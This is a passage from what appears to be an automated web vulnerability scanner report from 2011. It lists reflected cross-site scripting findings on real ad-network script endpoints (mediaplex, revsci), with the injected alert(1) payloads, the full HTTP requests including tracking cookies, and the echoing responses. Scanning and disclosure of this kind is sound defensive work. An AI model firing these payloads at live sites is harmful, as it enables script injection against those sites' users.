...[SNIP]...
r_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fe0a304&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=244212456737&imp_rvr_id=244212456737da817";alert(1)//8907316c81d";
var mpcke="<mpcke/>
...[SNIP]...

1.304. http://img.mediaplex.com/content/0/711/126780/82486_US_2011_Q2_Modern_Default_300x250.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/126780/82486_US_2011_Q2_Modern_Default_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7ad2"%3balert(1)//bdd24477cf1 was submitted in the mpvc parameter. This input was echoed as c7ad2";alert(1)//bdd24477cf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/126780/82486_US_2011_Q2_Modern_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-17177-2%2F4%3Fmpt%3D2386637677267723220%26siteid%3D0%26adid%3D327952%26imp_id%3D2386637677267723220%26fcid%3D327942%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fe0a304%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D244212456737%26imp_rvr_id%3D244212456737&mpt=2386637677267723220&siteid=0&adid=327952&imp_id=2386637677267723220&fcid=327942&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fe0a304&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=244212456737&imp_rvr_id=244212456737&mpvc=http%3A%2F%2Fr.turn.com%2Fr%2Fformclick%2Fid%2F1CMbkVIKHyEurgkAaAABAA%2Furl%2Fc7ad2"%3balert(1)//bdd24477cf1 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=15017:34236/5712:3840/16228:26209/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:33:33 GMT
Server: Apache
Last-Modified: Fri, 24 Jun 2011 20:12:54 GMT
ETag: "78880e-a5c-4a67ad3a6fd80"
Accept-Ranges: bytes
Content-Length: 3580
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck244212456737\">" );
var rvr_id=244212456737;
var mpserv;
var mpi="<mpi/>";
var mpcrgif="htt
...[SNIP]...
<mpvce/>";
var mpvc="http://r.turn.com/r/formclick/id/1CMbkVIKHyEurgkAaAABAA/url/c7ad2";alert(1)//bdd24477cf1";
var bangmpvc="http%3A%2F%2Fr.turn.com%2Fr%2Fformclick%2Fid%2F1CMbkVIKHyEurgkAaAABAA%2Furl%2Fc7ad2"%3balert(1)//bdd24477cf1";
var mpcrw="300";
var mpcr
...[SNIP]...

1.305. http://js.revsci.net/gateway/gw.js [ali parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the ali request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37240'%3balert(1)//b0597a5472e was submitted in the ali parameter. This input was echoed as 37240';alert(1)//b0597a5472e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=432&vid=6127792&pid=456378&pli=2120305&sid=1887835&ali=313030737240'%3balert(1)//b0597a5472e&cid=9518378&p=275&ref=http%3A//d.tradex.openx.com/afr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Di& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_POOa="MLsXtSHtJzpvJ5G+ytKgurD8xZbguKBAUoXMlOhbDZEIyUnXvCY/f7eEYgF17PuoYfq5CEudAjRL1GbcO/7J60JGGit5YpjkTi94QZ++NpMovzSXDH2egifUZfAGA4x6DJ1ef7CxdWNM1Ath6aEIxixI6X+ZFnchP7su1AfMVdmbt4uXOwFbARuez9yGUILljsr8iZpbE0YOpDX/I8dVzRiqWCbJWrig0+Ygf+aONwJLVAG9Qci4qyJ0OEoyF/C9WVXIsdxjo58DG+M5Z24kOQTzZzl9WL1fBtLwQMgZBQn3zjpdo1exh0bsmOsoJq0J12qVAbFThsQz5IDt7CkQiyleF6OSs84OYdv+QMiLgpV9FRrdszNyJ1Z1zdWSL2eBUsGyJ9LgmSypFoj2IJYq+CYjKuJh1q5SotTKfyoRjtQMIlYaw1bYORoY2KsywkRFoyeuXaDHr+kubAEaiR4mv+ueQqOTBqIL8EaJVKNeK14CvyaGEGiOf4xVidLPtWVp2cvmx+x8USaJltoPt52X7Qo3G9b5gMMSX/O7j4QHvGs068mYD7Jt0w3zVBoiChmjJijUOZI7pBIcB7pcDyhPXu0ekU8FNf+EZ2maUs/pJNfuLWhxzdwV8IFJvoDuP/k2F1fAFaKV5m3tJu4Kbsthsmobn+AEKG1fmaDEW/Rl9s4FMKHX6d1NaUg1aGoUNW9vlSNUkNQyg5xbyIqlIG60UCqagEd7akjIlHqEKgyVPmZRXCZsks8KUgS+ggIDyN3nm8Q9ybV7DYPDsaMVL9l30qTRehQMpViyu4aazqatyngUryJYSDMAw3MoxCYvzLg4VI0yQpDT4YM7EL/sjZF3GBKEvexarBUJ8IhXSEgBy8YPlIb7J1fU36Xok+aMd7hKisl1fiJ5L9WWlvPngVsNahS23h2ilcpGbvT7P8I1H67JHJs0T5zOxlbKA0tgt1XwzumjmY1MFQG7npmmjsejndnQNq6/1ECJ9acOs9TLs4eapvNZQ+7+XrqZbKo7Bg0R+TcmXPDWqHBSsNSRS6PEPs+B0Hn8vC43OULFX/VMEqBD7Um7K4PkKLzZ45EK/e7fMS47h1FG+y0pSm42Y6HkNkhnxCrDjBcgROJzznpsuIbJZQHyXl8j4cUgGiZBxqQSPqhFr9mtghL4GOwp2YKJAlwRxM+bjbCTXIMg2izcge98/uLVSVc1qMa6m03veDkqyKsoaPFeEkA2OOgtvIAoNV11Moc2Q+7bMZeZl4CDzl94tevQyhvCzcZDWHw1CA4qMQBfMOZr4xEG93vu+i9zYjr9xG1HA/txVLLWfK/bAKKmN6fqLbcY2pW5lpqW2FJxi65P63qhCJt0YP0gMlFmQMsihPn4MV2v59cKlKSELXAgqbss7TVL5/B0TuuGU260dpfoFfufumXLCpyIlXH1DRvhprlFYuymPmKAKQrrAUgRzvmuXaEHlH5jRUx1uEFjhqo7hOpqY+eQR+el8zb4xYyA0B3Fjnz5zUZGXZEUOHOUu5GVkR50a/qnzLWhgVLpMsIBeAsDZwR2196JkcyvgVxTSCglY6cvfSw1V+yzCTCmcXLsyRIBE5QZz41zi2x/Bw=="; rsi_us_1000000="pUMV4imj8AcUrmz9liw1aYw2dfGs5o1KAlJo9K0QCDj4fNEUgv6Osz0QwizypDUDUf2xk+ZaltbSV3CZr0FJCVOcSXPSBSrR8TY9XEPiQQkLiIgJsUdU1J8b+cmUO1u/e5w0aSvpozFtsZG97DTlWgkDT3hUeS+9KzfLpTHg4msr1VZXs1fzBUwkZh0/77iC9ZthYjW9RGWrOt2zvTRXyM5qSkSpLBCtQQQBK9Ienb2qAvlBSFmj9tQiR9OzbvRD1u296rd6wTgDJ3HdJfQ9FKdoXC0mBa3Oyz2LuLvhSS9WCiFuiLycK3DnWk0nOR9MqUj8Q3CP1f+UyFanTCJ75jvEnT41YGHRa0zmvDbA2EajyIQ1IH4RTypyKgAked86yi7GcvSawGtsu5zWF0CMRn7me+fyex8bQapD6bcYKTLBNJZIYOe5XtAXndyjVLA5nkGWixGYi/hG+GZUTKYiWMXb/EAPE9m/JUc1Myot4m7i59QSQoX0NJ5NSPpOe9nhCz7RUUezgnHPCVScsVDHN0K0eQtEkFovScTquaLvL64njs+Kp7BUx1Y+9ljzFfkauwQIfSnlIAD5i50tKTLduy1Lbmcds2xEkMIoFPyAvDSEr3kmHs6B9HA03owtmn5PRVpmS3GDAmZVDx1Br+3Mwc2VQmwrn8Xj8lARZLU4+Qqc0EEM9v48NUaCuTXadlOKl6oEJXijoNSBnJvehtYc2Tt1shetJDNMMxa5Kr6u2BSwMi3VmMON91ModKkwrHWmcdckgI+wic36jyg2i7m+A7L7k4QS/u4frTqUxraiP100y06o+VZcc9tZ+9r08TNxAozPhmxNBswBe+MUCpJcZOE/a4mEVeMUE00pIZ/Cl4q89t7HHvyEDHUJKWd+chMAc4BIHiGC2espd9xJ9uezlS7j58VHAzY4cDoPG9HqVz4BLwrelGJRQ+vEp//7RRqG+lxsCG1t//t7i1+lgnqXSSbtjg5YXET6sTq8hoQkLd+EPtUioVWXVZORVGCRsg2Konm5wX3+YuTBGRpo0nJp22OM5YKwQuB2azDdOIwkpoMzxawuKbupbRgMWZyw4izS3juV+GrhXJHCpDXR2iBRh+4inpxqC4uhApgkdsMhsO25Heugh6WaXGQ+WcA2VLbVvjikP9RSms6tZOHs+yf8M16aYMJIUF58e8Uqe0zn2o41FUtS121mYKP+/qI+wS5F7Zh6sn+sZMnN78sfxWEhxs2iXS2sVL7Hj2yupYTeSztI/zVXYwxUNtBLYBVljWkr2eJdUI55nK5GLE2DEzM4XoIM9HVqd3xTGRceYGXqTvZ5Oj9PrQaHEXejfNqNUkVt1KoOBQgPMAXJQxXlNhCNtPlexE+mJdoS03AZbMVwsJOStchneQ2jegEYuZGMterT7a1Jyf/bAIDJdvtPjfHPHGFSqkcXLsVvVgG9iP6EnwtyKUu/nGiRbB1Ua0mn1h8oNlvPW6GwuW4ROKZgYqlrlCV0uJovub26/SG4BV8d6fPJ8Yyzo9dBNXXjcqxyPNilXzhDwW7/YR1FczjeIJoqG5Whuwcn+6iBH7PQmVBcCB6Gfb1Bh4hvlq9sj+HGWPxAVJbkUEPr2divxHawozhlrrwarFkG8xmtaFDQsZtLADn987gJviLi/ynq7quSDHxKl7ec8yEETlPZY+XMqjpCnrO1hbcbmXc6fNwO+ee5Fb4rDSotXCJLLrGIZEoKsZ2/Tm/NtZ6TYpY4D6p067FjHgAMo+PrJduun9GfQzip2XlSMu9Hwqf63ZzXA//CFAVvuwNdCsQ0r1sMO/3MmQGbrtI6FfdqfBRQU6Ch/QEnMwOcLtFJajNRpHECIGA/NHN/jhVpZlgEBZVFx3osemVd+DCUef6vduRtxIxmmuD5uQg5z2tgX0J/Vj92MtHEeGFLozcMIzQ2ewgP3sBMvJeocw4zHYtdEXfqPmUhcRIIoQh+DAbjKQMj9+XIulQLr/FsOurshu62U75m45J7nYuUBsbiwyRaE/VZ"; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rtc_k8KG=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; rsi_segs_1000000=pUP94zmhOXMMH/C1v6FY5BD9CU6duy7ESpLgzGDKYyViGwmWW18bAQsYoAM+8HjFdJtFJWRCiLHBLDbWsPcI86yrtpktmfFacilUsrkfIWWKJiDdQnsDK82st/RBdHlSiCArToI74iBMHEIM6aRZ+ctyPyV2AcskZoa93bnD+7KzmMsYNaQWBrrYkNUezvQnLXGkhVG05Odz4K2YkQ7efGHGdJsOKQEkcQBYjtqaS6H7ZlDNGWHeUbBT+7iWjqkltSlqdFkY5ZCSD/LpMe6oE2LhWxsHk9CQb4f/4DBRvVR+Vsn3Wa2otHHl9DcyWQkxt+HNZk80xAqzN7umu7qJn1io7bu4IlqZWRAwUL/2riYdQyqUN2xVKYYypoVq1rD+CHWBoax0NCsrkHXbllfg48mnErvVtscNhDauRsHqShGST1ntuJP8Y2uTzuL21JyFn9D8BzYJI7XWgqgHY3hwgF1X4Spu79NlxqFyDqacIxYDmgj/c/80HbjalDyO2MjzVEQUdlANyAYn0j8EbYmxQKxsM6Rx3taFnmBYEmerFK8BfqeoKPoaXWO+nwv0ryXCZUva1SDjlo2wVhjQ76dAQ1KhNRC+7n6erq2kuZ1UHS7gGJ+a8IPLnbMauEqtWz/vfr9PAbndBB364psLhQxsNBZ/V+G5/rjrxQ6XCrYppz+AmSwLTlzgnXYOZE+rGQrANefuO3zqAEj7Orx7bW+c7SVq/vKvEfxbwhQK4Bb0D6+TT7bmiEPzBBOMjJtdSmdMA/UlA/1ADQ==; udm_0=MLv3NyEJZjpr3xSpL/sKOUxICxpURCNKVG8JBfsMOWr4c1ruOor8IW57ubLruJ70uAvWzxrBuHPGjOV0Yl999w9PWZEwp6XsRgcj+GkbCgPiYv9OYis//qNYlXaQsRkv1/9n8rbpls3/lg3b/9yLcovhjH8xhVus+bOGmVMfi7o7gawXwNvz26uIS28JGVLlC25P0hSiX8y1K25Ud7EXnL8DDb8pkUWpjvKZpMzKbPpZV94WqnSr172thZ8syzScr9cZG9oqnzD7bqSMJL5BQKcgxSuou8ECw+GXnkdl4OmbY2FbSYlCDRgc+/c6lhFH7jE0YNiubrzPt27J/JEc0Gs+XkI+Ebd1WvYw9/Xd7ftCSDR0Zwe8AhR6iKptca2vjFNTTKo+OkkLJW2FIsLYkAONGVJ9hOmW5e084U7uw0vM+Lhdzw9TqVu5ygVCjUYWXFmCqrrrRk62v1d6cSVtIHFIJ4lePrRIuyqlN2ALWcWNJ2nVPNQCtG6Dh8DEERFi+XoP1wPFhC0GiF7wn0MHND/wCWXx/JWKUU+VC34cUxuUta3r3XuTvx4d+vBQXuDPDnw29QIFptXZW6fOOuymtApEj21aZsv0egu11Apu04LD/roZjbpAC6QGunZcYL9ssZpQjWQYMBZlGqIfgh3iuuWUsPHTBGUDt5cscdNfS7TKpmHXmthcbc/d7e+/MnAdrT/1ZehbDdCHZQeWj6mIfzSpZ8cC3Zk24ZglqRgwNFbilMuOn3DcO2ugB4zdEQcmVaaz6YHh+JNmmLMjl2TA24PK3xD+fbpmhzFvEBjIi7clvv9qOiJtouwDDd2RQYT2Ep3F/HnCv/GaCR4wdJNb6Izjx2OU4EC6SMnmhzRJZx1Mvbeyktq11Zi2w55ZWgZls7Q7wzCg65f8+2GBHdPcBi0xQFO8j756qtOn/3dAStKIMF35glzGEz2NyJbHKXBtkH2X19gpB6ax9rOyGogvW99/utdnqqUGrzn/kEpQnDa2kEUk811wVSbL6q60O/bbCiUNeKz3rRkQPFP8+aD6V0zGLjDPKncsy1hNjN1jRpSMXKxDqVRdpcYwttiPkWREhaInub+YWVtT1oXubfLiNHV9UJeD2k0fkb7r3mvCCEYCbYbJQQbyzKSxCaY/3lu5/BahDewpho2bntF1PV9ZAIHz13i3/QIFqKunfGZergISuHHcpD6S5AkX5oSnOVAymhcRYncJuDVR7w3F5RLVa7EHGecTDqlEvm59ZX8cTQ5bzJ1Abtx13XYb7j1u7zVIfeXneYS+0GlZAi3yogjdpiPiBw1EH7P9o/q1Zg7W9IkgH/YVzge06UUUK4rT1AoMaf8i7WK1YW21srH7XQ0Ot8fltujTte/8QbNhYbI7IG0rOSBbSov47vv3n6MjpPrAf5qhMAXLUGatxFcl4tsfOkACgIvhTn8I6rAXvEYYlNAxsCfXmnI0p8hQiJERchlgDMgmxns4Ly+e/p6PMLWHzPtN5c+q+g+IPQG377uaac8DJzK02AriShlM9dZKDYxgqlG+zJ24k7ffFdBB4+ibuSXB8ld6ZqZ1O9+R2LgBbwAuSwdkT4ftgIBysXBOapY6pYD+cT84SMwsgTEMDgtYrO7hiyO4Q+hxJwlkbjJNzvJXX1Y8JfAsyg8ZWg53ml7FrAz2kysF0CgU8P9ILnou5Ckc6kCRS2UU0ZoeR188Jg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMNbjpn3tMbCZL81gwqrs7Jatc29T4IRekPoFmURh+2DEO1qEQkxN2so69MR7yr7LlL9g0+kUNWS0PHEiS2p0vQaqXlpmJ62BjFdh1m7Vo610Asme4IheEqDAiARVHa9wiYUb7uHa1cx/kBqlirnd4yhmaJJsLPBJlmUn2J2l9WIWbYxnq87RLJ0FPyfFdHBfq8ktt8BlGOMhpT7ekUtxeW7EEeKy7GYdepRLO9l66JqtdR1VH1P9RET5aa2JTRGQEEuEu+pUdSZyOmA65Jx/BEPA3SZrK9aLm1qpHs2GH0JbKXYfBmoiWrQJNQVLUTufFVMoRwKl8Htak4LbwB9K61aQvEdcuXcCOFfgcrMcfXuuRfEYPW1E9PjW2gx8t2a6O/zVtIU+kymE67NAWdItrUjXiDDRl8kP6Z/bwo9E/UaBcjPPwb9snqbY9xN7WDqWgS8N2N/jlabvPcnRBUZzQKckXVcsYHUuYoCP9+BCpJk8xFwPwlklDTA/Cgovnm2b98votiz6rNnp3bWbV+I7NxQTMtNAmDJGe7jn12Gxbcmi2Cp8+c7Z97i4dMgFBEV+imERpPoSgAEzz7Do68ZmfTEDEs5kx7rc/x23Xd5tRTA49nZyi0btRjKOE9JXvaLeWFmx8gHHPRcC5Gq6vFTC7Ej3a3eMmAINqTCb9d6OVEwSibk0i5M9d8r+njUC57V54AaQokssofBVeY3nj3skv6FAV+UiUJnz3Z8rufdlz504bRHq/qa1UYkRCI19rTe9yCTsLuiZQNjysQowbTWIWYMXU3lX9HiCWB/zAHRCloJx1hP1Dfyf5RMH1PM5gVXCyP3nvhWNjZGjnxcNM/0fye9RRKCk4v8DM4yDGTkdfyGf8omti7BuwuOQB3hcVTzZfL750yo7ze5CG/m3HQv5XfS5J/1qShDFywqd3J3i+Z0g4UqadvTf0berq1gFOGhIPUHLyQTrAaTYZ3DCIpkHPwTr+A0CxfXmMtheylD5YXJIWdT/ZNX21amiucEnU30rFJuaiI0sqmzYnPpI9+YenjNvDmhog49HFvPxTP4nIMAl+eY6y9cs9jgfndN8BwcVi59G4xJ6Iyrt9kJ6uCGbyvR7fTCSNexiyxGmAbcJW96rsbT1qGhwMnkd1a9XPOt3bKXq7l3E9Yx7pPq6SEhREAqytAz08d3rtZGdO7ALAfNCuWQtfrPXTkiI0XjPXND1CerwBUE3C2N0ir2PMK5tB40lXwJw85EOUAFNu+JTET3S/eNvyojy69vh++8sLz0NbehVipemZO7MnUU8Qphqgntw0UFqOHkdNYISNZFg8G3+8LJPvJAXNALdMZ+rcMgdRMhJvK4deUtZjVERqRN7BkC2FLdBEzBGcyRxTre+4IF4S1aizgUDxp6MEjIMgcBvH3jeDcvyxIwBE7nt1u+iJCV0DgFCOJ8MoJysFt0xLTXx4UmjFWTw2K1ytyWGyb6xV9iEYvAKgCs3/CWl5fENImQNFj9c9q778VBqUcqxPdgTB8mlvpqXOjAM/c8KtosLYQLRmFDMQ1jP9Ilr4lLuwH3ZAvPZ0dG4brvqfuAIcggICjmnOe01zjgqLTNulmsIlWpcPIJ1D0/O9Gpm/fwA1PIY8iJ5Hm5PCLpr759UbBhtq52pWDyIyekCQqJFLbANghCGivYQRtv4rQGEXgrmun9PCIKk1yQ9Xo7/r/Fll4sl9iFMu3S3NeMaAm6s1debk9diKnB+OktchseihNYsZARvjcpfHXhT1fmIqpBhhgRx0v7Yj9X8AMTh8PD9ZQFQHNuwlPOeGXWXgIgEgEs/BCw/NKjSnVLUlRG8LSkggHmx6UgEI28+apZc4IToVPYELPKpkvBEi+bw==; Domain=.revsci.net; Expires=Wed, 27-Jun-2012 03:01:00 GMT; Path=/
Last-Modified: Tue, 28 Jun 2011 03:01:00 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 28 Jun 2011 04:01:00 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 28 Jun 2011 03:01:00 GMT
Content-Length: 6236

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

A10868.DM_addEncToLoc('vid', '6127792');
A10868.DM_addEncToLoc('pid', '456378');
A10868.DM_addEncToLoc('pli', '2120305');
A10868.DM_addEncToLoc('sid', '1887835');
A10868.DM_addEncToLoc('ali', '313030737240';alert(1)//b0597a5472e');
A10868.DM_addEncToLoc('cid', '9518378');
A10868.DM_addEncToLoc('p', '275');
A10868.DM_addEncToLoc('ref', 'http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517&cb=i');
function asi_addElem(e){
...[SNIP]...

1.306. http://js.revsci.net/gateway/gw.js [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

